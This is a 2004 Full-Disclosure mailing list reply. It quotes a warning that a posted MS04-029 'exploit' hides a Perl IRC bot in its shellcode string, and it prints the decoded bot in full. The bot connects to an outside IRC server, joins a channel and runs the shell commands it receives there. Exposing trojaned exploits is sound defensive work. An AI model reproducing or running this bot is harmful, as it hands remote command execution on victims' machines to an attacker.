Yep, Dave pointed that out really fast... > -----Original Message----- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of > Barrie Dempster > Sent: Wednesday, November 03, 2004 3:19 PM > To: [EMAIL PROTECTED] > Subject: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029) > > > Excellent exploit, I'm sure no one will spot that perl IRC > bot in there, nope no one will see that... > > (hint for the readers, try looking at the ascii out put of > the "char *shellcode_payload=" data, looks a little like the > following....) > > [code] > #!/usr/bin/perl > $c > han="#0x";$nick="k > ";$server="ir3ip.n > et";$SIG{TERM}={}; > exit if fork;use I > O::Socket;$sock = > IO::Socket::INET-> > new($server.":6667 > ")||exit;print $so > ck "USER k +i k :k > v1\nNICK k\n";$i=1 > ;while(<$sock>=~/^ > [^ ]+ ([^ ]+) /){$ > mode=$1;last if $m > ode=="001";if($mod > e=="433"){$i++;$ni > ck=~s/\d*$/$i/;pri > nt $sock "NICK $ni > ck\n";}}print $soc > k "JOIN $chan\nPRI > VMSG $chan :Hi\n"; > while(<$sock>){if > (/^PING (.*)$/){pr > int $sock "PONG $1 > \nJOIN $chan\n";}i > f(s/^[^ ]+ PRIVMSG > $chan :$nick[^ :\ > w]*:[^ :\w]* (.*)$ > /$1/){s/\s*$//;$_= > `$_`;foreach(split > "\n"){print $sock > "PRIVMSG $chan :$ > _\n";sleep 1;}}}#/ > tmp/hi > > [/code] > > -- > Barrie Dempster (zeedo) - Fortiter et Strenue > > http://www.bsrf.org.uk > > [ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ] > > > >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
